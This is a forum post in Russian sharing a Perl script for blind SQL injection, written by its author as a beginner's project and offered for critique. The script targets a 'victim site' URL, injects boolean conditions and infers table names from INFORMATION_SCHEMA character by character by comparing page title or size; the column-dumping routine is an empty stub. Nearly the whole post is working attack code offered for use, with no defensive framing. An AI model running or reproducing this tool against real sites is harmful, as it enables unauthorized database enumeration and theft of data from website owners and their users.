Эммм.мои скромные начинания в перле,здравая критика воспрнимается Собственно тулза для работы со слепыми иньекциями,а именно для подбора имен таблиц Code: #!/usr/bin/perl use LWP::Simple; use LWP::UserAgent; my $userAgent = LWP::UserAgent->new; my $titleok ; my $done = 1; my $server = $ARGV[0]; my $typequery = $ARGV[1]; my $typerror= $ARGV[2]; usage(); if (!$server) { die "Read Usage!\n"; } if (!$typequery ) { die "Read Usage!\n"; } print $typequery; if ($typequery==1) {$querysql = "select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+where+table_schema=database()";} else {$querysql = "select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES";} print"\n[x]Connecting: \n\t$server ..."; my $Attackok= $userAgent->get($server."+and+substring(version(),1,1)=4"); if($Attackok->is_success){ my $contentok = $Attackok->content; print " Connected and Saved \n"; $titleok = get_content($contentok);} else { print " Connection Failed\nDone"; exit; } print "[x]Length And Data Information Tables... :\n "; my $Countertable = 65; my $title; while($done) { my $lengthCounter = 1; my $val=0; while($val!=1 && $lengthCounter<50) { my $content = get($server."+and+LENGTH((".$querysql."+limit+".$Countertable.",1))=".$lengthCounter); $title = get_content($content); #print("\ntable leng:".$title."-".$titleok."-".$lengthCounter."-".$val); if($title != $titleok) { $val=1; print "\n\t[$Countertable] ($lengthCounter)"; print $tablename = blind_table_name($Countertable,$lengthCounter); blind_column_name($tablename); } else { $lengthCounter++; } } if ($lengthCounter>=50) { $done=0; } $Countertable++; } print "\n\n"; print "[x]End... \n "; ###################################################################################################### sub blind_table_name { my $res = undef; my $i = 0; my $val2 = 1; my @cset = (48..57,95,97..122); my $titles = 0; while($val2<=$_[1] && $i <= $#cset) { my $content1 = get($server."+and+ascii(substring((".$querysql."+limit+".$_[0].",1),".$val2.",1))=".$cset[$i]); $titles = get_content($content1); if($titles != $titleok ) { $res .= chr($cset[$i]); $val2++; $i = 0;} else { $i++; } } return $res; } ###################################################################################################### sub blind_column_name { # come soon } ###################################################################################################### sub get_content(){ if ($typerror == 1) { if ($_[0] =~ m/<title>(.*)<\/title>/) { return length($1);} else {return 0; } } else { return length($_[0]); } } ###################################################################################################### sub ascii_to_hex ($) { (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg; return $str; } ###################################################################################################### sub usage() { print q { ################################################################### Blind Scan by baltazar Usage: blinqsql.pl [Server] [Table] [Type Error] [Serveur] : Url Victime Site with True id / [Table] : table site 1 , all table 2 [Type Error] : By title 1 , By allsize 2 ################################################################### }; } ######################################################################################################
